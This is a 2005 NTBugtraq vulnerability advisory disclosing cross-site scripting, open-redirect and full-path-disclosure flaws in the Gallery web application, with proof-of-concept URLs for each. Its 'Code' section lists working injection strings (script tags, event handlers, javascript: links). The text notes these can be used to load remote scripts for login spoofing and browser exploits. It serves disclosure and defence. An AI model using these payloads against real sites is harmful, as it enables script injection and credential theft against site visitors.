Gallery v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha Cross Site Scripting Vulnerability

From: Rafel Ivgi, The-Insider (theinsider_at_012.NET.IL)
Date: 01/17/05

  • Next message: Rafel Ivgi, The-Insider: "Kazaa Sig2Dat Protocol Remote Integer Overflow and Denial Of Service by creating files in arbitrary locations" 
    Date:         Mon, 17 Jan 2005 22:34:43 +0200
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application: Gallery
    Vendors: http://gallery.sourceforge.net
    Versions: v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha
    Platforms: Windows
    Bug: Cross Site Scripting Vulnerability
    Exploitation: Remote With Browser
    Date: 17 Jan 2005
    Author: Rafel Ivgi, The-Insider
    E-Mail: the_insider@mail.com
    Website: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bugs
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    Gallery is open to Cross Site Scripting vulnerability, allowing a remote
    attacker to inject and execute scripts on the user’s machine while visiting
    a remote gallery.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    Gallery v1.3.4-pl1 contain a vulnerability inside ‘add_comment.php’ in the
    ‘index’ field. The injection can be done using the classical tag closing:
    "><script>alert()</script>

    For Example:
    http:// host>/gallery/add_comment.php?set_albumName=Eros&index=1">
    <script>alert()</script>

    Gallery v1.3.4-pl1 also contains vulnerability inside ‘slideshow_low.php’
    in ALL the fields. The ‘slideshow_low.php’ contains the following form
    fields:
    set_albumName
    slide_index
    slide_full
    slide_loop
    slide_pause
    slide_dir

    The injection can be done using the classical tag closing:
    "><script>alert()</script>

    For Example:
    http:// host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_
    index=3&slide_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&sl
    ide_dir=1

    Yet there is Gallery v1.3.4-pl1 vulnerability inside ‘search.php’ in the
    ‘username’ field. The injection can be done using hex encoded tag closing
    and an HTML event:
    %22%20onactivate%3D"alert%28%29"

    For Example:
    http://
    host>/gallery/search.php?searchstring=%22%20onactivate%3D"alert%28%29"

    Gallery v1.4.4-pl2 contains vulnerability inside ‘login.php’ in the
    ‘username’ field.
    The injection can be done using hex encoded tag closing and an HTML event:
    %22%20onactivate%3D"alert%28%29"
    http:// host>/gallery/login.php?gallery_popup=true&username=/*%22*/%20
    onactivate%3Dalert%28%29%3e
    This version of Gallery also has an open redirection, which is a security
    risk because
    an attacker can send someone a link with a redirection to his evil host name
    or to cause
    the user to commit an attack or waste a target’s resources.

    For Example:
    http:// host>/gallery/do_command.php?set_fullOnly=on&return=<escape
    encoded evil
    host name>&cmd= All the vulnerabilities described above can be used to
    remotely call
    a JavaScript file The injected JavaScript code is responsible for:
    Automatic launching of malicious code (remote compromise by I.E exploits).
    Identity theft using a spoofed re-login window (only for galleries with
    login)

    Gallery v2.0 Alpha contains vulnerability inside ‘login.php’ in the
    ‘g2_form[subject]’
    field. The injection can be done using an inline javascript protocol call:
    javascript:alert()

    For Example:
    http:// host>/g2/main.php?g2_controller=comment:AddComment&g2
    _form[formName]=AddComment&g2_itemId=<valid
    item>&g2_form[subject]=[img]javascript:alert
    ()[/img]&g2_form[action][preview]=preview

    Gallery v2.0 Alpha contains another vulnerability inside ‘main.php’ in the
    ‘g2_subView’ parameter. It is possible the replace any valid subView value
    such as: comment
    :ShowComments with the admin value: core:UserAdmin. This causes the gallery
    to wait 30 seconds
    and then print out the Full Path of the gallery on the server.

    For Example:
    http:// host>/g2/main.php?g2_return= http://
    host>/main.php%3Fg2_view%3Dcore
    %3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3D< any valid/invalid session
    id such as:
    be869b98355e8d445c8ec8f97cb343da>&g2_view=core:UserAdmin&amp;g2_subView=core
    :UserAdmin

    Then the following data will be printed out to the attacker:
    Fatal error: Maximum execution time of 30 seconds exceeded in
    /mnt/1/<name>/www/<host>/g2/
    modules/core/UserAdmin.inc on line 55

    Second Time
    Fatal error: Maximum execution time of 30 seconds exceeded in
    /mnt/1/<name>/www/<host>/g2/
    modules/core/classes/GalleryUtilities.class on line 596

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    Gallery v1.3.4-pl1
    http://>/gallery/add_comment.php?set_albumName=Eros&index=1"><script>al
    ert()</script>
    http://>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3"><s
    cript>alert()</script>&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1
    http://>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
    de_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&slide_dir=1
    http://>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
    de_full=0&slide_loop=0"><script>alert()</script>&slide_pause=3&slide_dir=1
    http://>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
    de_full=0&slide_loop=0&slide_pause=3"><script>alert()</script>&slide_dir=1
    http://>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
    de_full=0&slide_loop=0&slide_pause=3&slide_dir=1"><script>alert()</script>
    http://>/gallery/search.php?searchstring=%22%20onclick%3D"alert%28%29"

    Gallery v1.4.4-pl2
    http://>/gallery/login.php?gallery_popup=true&cool=rafi&username=/*%22*
    /%20onactivate%3Dalert%28%29%3e<plaintext>
    http://>/gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fwww
    .google.com&cmd=

    Gallery v2.0 Alpha

    1) http:// host>/g2/main.php?g2_controller=comment:AddComment&g2
     _form[formName]=AddComment&g2_itemId=<valid
    item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview
    ]=preview

    2)
    http://>/g2/main.php?g2_return=<host>%2Fg2%2Fmain.php%3Fg2_view%3Dcore%
    3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3Dbe869b98355e8d445c8ec8f97cb3
    43da%5C%5C0%5C%5C00%5C%5C%5C%5C0%5C%5C%5C%5C00%3B%250a%250d%250a%250drafi&am
    p;g2_view=core:UserAdmin&amp;g2_subView=core:UserAdmin

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

    ---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Scripts and Codes will make me D.O.S , but they will never HACK me."
--
NTBugtraq Editor's Note:
Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered.
--
  • Next message: Rafel Ivgi, The-Insider: "Kazaa Sig2Dat Protocol Remote Integer Overflow and Denial Of Service by creating files in arbitrary locations"

    Relevant Pages